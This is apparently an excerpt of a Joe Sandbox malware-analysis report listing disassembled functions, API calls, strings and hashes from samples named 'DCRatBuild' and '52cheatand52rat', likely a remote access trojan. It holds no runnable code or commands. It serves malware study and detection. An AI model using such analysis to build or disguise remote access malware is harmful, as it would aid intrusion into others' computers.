                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                        • Instruction ID: 07d1b6240fac617c6a0eb2fd026f25a0691d48f37506bfc8caa84df5e113d38f
                                        • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                        • Instruction Fuzzy Hash: A6C04C26106E4CD41C113AB1620A1FE07000C637D7BE220C2EC88571A3DECF060F9536
                                        Function 00749F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00749DF1: GetDC.USER32(00000000), ref: 00749DF5
                                          • Part of subcall function 00749DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00749E00
                                          • Part of subcall function 00749DF1: ReleaseDC.USER32(00000000,00000000), ref: 00749E0B
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00749F8D
                                          • Part of subcall function 0074A1E5: GetDC.USER32(00000000), ref: 0074A1EE
                                          • Part of subcall function 0074A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0074A21D
                                          • Part of subcall function 0074A1E5: ReleaseDC.USER32(00000000,?), ref: 0074A2B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: (
                                        • API String ID: 1061551593-3887548279
                                        • Opcode ID: c2bd6a24ceb62d35e73f2d06383295710dd117a518ffe0509d6b3e99f4198fc9
                                        • Instruction ID: 8cc1927b028283757b33c252e671ffadaa4afa3ff39ffde03316ba3d0942c6da
                                        • Opcode Fuzzy Hash: c2bd6a24ceb62d35e73f2d06383295710dd117a518ffe0509d6b3e99f4198fc9
                                        • Instruction Fuzzy Hash: 12812371208304AFC714DF68C85492ABBE9FF89714F00891DF98AD7260DB79AD05DB52
                                        Function 00740E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: b5e89d0ffa69414c5da37cee1d1733cf0060bbd10c39ecfe31ffee226036aae1
                                        • Instruction ID: eb87844986141097dbac4adfed9152827bb800d12040dd6765d21fcc7acde794
                                        • Opcode Fuzzy Hash: b5e89d0ffa69414c5da37cee1d1733cf0060bbd10c39ecfe31ffee226036aae1
                                        • Instruction Fuzzy Hash: 9251E43128C750FEEB303AA0DD16F367655AB05B00F204917B79B648F2C7BE54B47A92
                                        Function 0073772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737730
                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007378CC
                                          • Part of subcall function 0073A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A458
                                          • Part of subcall function 0073A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$Attributes$H_prologTime
                                        • String ID: :
                                        • API String ID: 1861295151-336475711
                                        • Opcode ID: 523621095add1619539b8ae2b9d1c7dcba3b8a11c7be72a11711b332beb10155
                                        • Instruction ID: 4d0c8a026d0ac2675e8233f6c61378aab3c8edc16ff99c339d408b10598786b4
                                        • Opcode Fuzzy Hash: 523621095add1619539b8ae2b9d1c7dcba3b8a11c7be72a11711b332beb10155
                                        • Instruction Fuzzy Hash: 884131B1905168EAFB35EB50DD4AEEEB37CAF45340F004199B649A2093DB7C5F84CB61
                                        Function 0073B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: UNC$\\?\
                                        • API String ID: 0-253988292
                                        • Opcode ID: 18633068191282b81726ab64678a3bec8791737efde08ffbc74d578a84ad2c93
                                        • Instruction ID: d968433ce77d81aae88000ddc13c5fee56343873241e5ee1b000c329675b357e
                                        • Opcode Fuzzy Hash: 18633068191282b81726ab64678a3bec8791737efde08ffbc74d578a84ad2c93
                                        • Instruction Fuzzy Hash: 4D41C375840219FAEF20AF61CC45EEF77A9EF84390F104026FA15A3153E77CEA54CAA0
                                        Function 00748FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Shell.Explorer$about:blank
                                        • API String ID: 0-874089819
                                        • Opcode ID: 06c568342b4035bf7514bb95ce507cd8aeb2e47e28fe1796cdcc3575dbefe16a
                                        • Instruction ID: 4d51ad0bd39af586d836bc8e06ebb89b2af34a72142f4cdb5b877107dfd6b2e4
                                        • Opcode Fuzzy Hash: 06c568342b4035bf7514bb95ce507cd8aeb2e47e28fe1796cdcc3575dbefe16a
                                        • Instruction Fuzzy Hash: C3218C71204305DFCB089F64C899A2B77A8FF84321B14C469E90A8B292DBB8EC00CB60
                                        Function 0074D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00050160,0074A990,?,?), ref: 0074D4C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DialogParam
                                        • String ID: GETPASSWORD1$xjx
                                        • API String ID: 665744214-132524196
                                        • Opcode ID: 0cae4c476b7602e108c6d4a8dff07c4c9b97bec8cf518c0e79f928cd07e37a6d
                                        • Instruction ID: d8b35f60637c8c09a1007aff28f838e23cdbe4cd1cfcf699d0b4af114cb706b7
                                        • Opcode Fuzzy Hash: 0cae4c476b7602e108c6d4a8dff07c4c9b97bec8cf518c0e79f928cd07e37a6d
                                        • Instruction Fuzzy Hash: 62112271640184B7DF32DE38DC0ABAA3798F709750F148075BD49A7191C7BC6C50D764
                                        Function 0073EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0073EB92
                                          • Part of subcall function 0073EB73: GetProcAddress.KERNEL32(007781C0,CryptUnprotectMemory), ref: 0073EBA2
                                        • GetCurrentProcessId.KERNEL32(?,?,?,0073EBEC), ref: 0073EC84
                                        Strings
                                        • CryptProtectMemory failed, xrefs: 0073EC3B
                                        • CryptUnprotectMemory failed, xrefs: 0073EC7C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: 7d0f28d4474191609013ddbc74cb84fd57324fac8b6a51beb402fd5ea159cf00
                                        • Instruction ID: c56c821058385974f398b1e2d9c9de613dbcda08b7a9340da792dc2f8c934857
                                        • Opcode Fuzzy Hash: 7d0f28d4474191609013ddbc74cb84fd57324fac8b6a51beb402fd5ea159cf00
                                        • Instruction Fuzzy Hash: 4D11E431A44328ABEB155B24DC0AAAE3754BF01760F049119FC0A6B2C3DB7DAE41C7E5
                                        Function 00759B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID: Xv
                                        • API String ID: 269201875-1716690856
                                        • Opcode ID: dd4d7904dc710820db7127f50654723f9aa6d7c4b43151bee1f6f7f1a791541d
                                        • Instruction ID: 1c0f6c1cc7309c81c9574840103ec9c973b8bfe6e8631f2787c113a00d8f914e
                                        • Opcode Fuzzy Hash: dd4d7904dc710820db7127f50654723f9aa6d7c4b43151bee1f6f7f1a791541d
                                        • Instruction Fuzzy Hash: 2A11E6B1B00212DBEB60AB38AC45B963395B750332F044226FE21DB2D0EBFCD8574785
                                        Function 0074EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0074F25E
                                        • ___raise_securityfailure.LIBCMT ref: 0074F345
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 8y
                                        • API String ID: 3761405300-1229904623
                                        • Opcode ID: d92f071dc260ae3299e49fdbc26cbc55770cc8344344382890f662e0d044346f
                                        • Instruction ID: 12c1972c52b0c2011ea0d2a373086b33e589a690ba0e50e748830591e96e2b5f
                                        • Opcode Fuzzy Hash: d92f071dc260ae3299e49fdbc26cbc55770cc8344344382890f662e0d044346f
                                        • Instruction Fuzzy Hash: 4421E4B96203049FD750EF68F9856543BA4BB49314F10986BE9098B3A1E3F95982CB89
                                        Function 00740889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00010000,007409D0,?,00000000,00000000), ref: 007408AD
                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 007408F4
                                          • Part of subcall function 00736E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00736EAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2655393344-3849766595
                                        • Opcode ID: fe6090d57e0b7f23933f58445d02f0f2358fee8ae189bbf34cd7b74fe319ef28
                                        • Instruction ID: 1613c854552400a4266426f1f22b14462c4a08e8d518eea908b87be9e4152ac1
                                        • Opcode Fuzzy Hash: fe6090d57e0b7f23933f58445d02f0f2358fee8ae189bbf34cd7b74fe319ef28
                                        • Instruction Fuzzy Hash: 6B01D1B5384305BFE620AF64EC86F667399EB41751F20403DFA8A92181DBBDB84496E4
                                        Function 0075B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00758FA5: GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                          • Part of subcall function 00758FA5: _free.LIBCMT ref: 00758FDC
                                          • Part of subcall function 00758FA5: SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                          • Part of subcall function 00758FA5: _abort.LIBCMT ref: 00759023
                                        • _abort.LIBCMT ref: 0075B2E0
                                        • _free.LIBCMT ref: 0075B314
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast_abort_free
                                        • String ID: v
                                        • API String ID: 289325740-2951754918
                                        • Opcode ID: 11b73a0da737a36e15f767fcc958d51b4e27541a6e33a2c80bbfbfbee69afcb0
                                        • Instruction ID: f2cefbbb029a7f17902bd8e5f84f65cbf113ac80a840cae01b307dcbfb6a7a89
                                        • Opcode Fuzzy Hash: 11b73a0da737a36e15f767fcc958d51b4e27541a6e33a2c80bbfbfbee69afcb0
                                        • Instruction Fuzzy Hash: A101C035E01722DFC761AF5988052BDB360FF18B22B09410AEC2577680CBBC2D4A8FD6
                                        Function 0073130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073DA98: _swprintf.LIBCMT ref: 0073DABE
                                          • Part of subcall function 0073DA98: _strlen.LIBCMT ref: 0073DADF
                                          • Part of subcall function 0073DA98: SetDlgItemTextW.USER32(?,0076E154,?), ref: 0073DB3F
                                          • Part of subcall function 0073DA98: GetWindowRect.USER32(?,?), ref: 0073DB79
                                          • Part of subcall function 0073DA98: GetClientRect.USER32(?,?), ref: 0073DB85
                                        • GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                        • SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0
                                        • API String ID: 2622349952-4108050209
                                        • Opcode ID: 860ad31a00d6fad0a601667e967fc0cc737b4d2c27f428ced6246154fe816665
                                        • Instruction ID: 9b9f983a93aa7b7a1dafc7ed25a524cad7430620e1d78d1d05567899f9291362
                                        • Opcode Fuzzy Hash: 860ad31a00d6fad0a601667e967fc0cc737b4d2c27f428ced6246154fe816665
                                        • Instruction Fuzzy Hash: 10F0AF3014428CA6FF252F608C0DBE93B98BB12345F48D014FD4A555A3C77EC9A6EB50
                                        Function 0074084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00740A78,?), ref: 00740854
                                        • GetLastError.KERNEL32(?), ref: 00740860
                                          • Part of subcall function 00736E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00736EAF
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00740869
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        • Opcode ID: 0aac769611f8b01c77d7a0e106ce70918ffb176a3f5c0b64283461c2b9f307f8
                                        • Instruction ID: 80c454e1d693b9355b1f2f02da210477120fa77b4f979eee0e6b45e3a1528eba
                                        • Opcode Fuzzy Hash: 0aac769611f8b01c77d7a0e106ce70918ffb176a3f5c0b64283461c2b9f307f8
                                        • Instruction Fuzzy Hash: A0D05B7554813076DA1027249C0DDAF79056F52770F208714F63A551F5DB6D095581D5
                                        Function 0073DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,0073D32F,?), ref: 0073DA53
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0073D32F,?), ref: 0073DA61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: a09927b80f34cd7feb2788293808f414afb9a18f5a79b13534014e27c67320c0
                                        • Instruction ID: 873f60aa8c1623f9c17d3f2849553da2c6253e89ece36fef6de077b0fbde0643
                                        • Opcode Fuzzy Hash: a09927b80f34cd7feb2788293808f414afb9a18f5a79b13534014e27c67320c0
                                        • Instruction Fuzzy Hash: D1C0127228A350B6EB302760BD0DB832A49AB10B12F09444CF642DA1D0DAFDDE48CAA0

                                        Executed Functions

                                        Function 00007FFD9BAA2731 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yU_H
                                        • API String ID: 0-404771944
                                        • Opcode ID: 3c36206f7ac005d54159c02f6647ca6bf77bbb3e6f4275cfbec40393459bf96f
                                        • Instruction ID: 6caca0c346cd0186c6af763557fdf2ed734dbc4091d49616972f42e8816772fc
                                        • Opcode Fuzzy Hash: 3c36206f7ac005d54159c02f6647ca6bf77bbb3e6f4275cfbec40393459bf96f
                                        • Instruction Fuzzy Hash: DCA1F731B18A0D4FDBA4EB6CD8516B9B3E2EF99750F4101BAE44EC3295DE34AD428781
                                        Function 00007FFD9BAA0E30 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yU_H
                                        • API String ID: 0-404771944
                                        • Opcode ID: 14387dcd654ca69549df67181f18e16a934d2b41990ec5d0cb1858e53b656377
                                        • Instruction ID: 00ef8ba1fdd516e63736e190972970e9ba91306a862c7ed03a397eff9e43c47c
                                        • Opcode Fuzzy Hash: 14387dcd654ca69549df67181f18e16a934d2b41990ec5d0cb1858e53b656377
                                        • Instruction Fuzzy Hash: D1A10631B18A0D4FDBA4EB6CD851AB9B3E2EF98750F01017AE44EC3295DE34AD428781
                                        Function 00007FFD9BAA5E13 Relevance: 1.4, Instructions: 1353COMMON
                                        Download Yara Rule
                                        Memory Dump Source
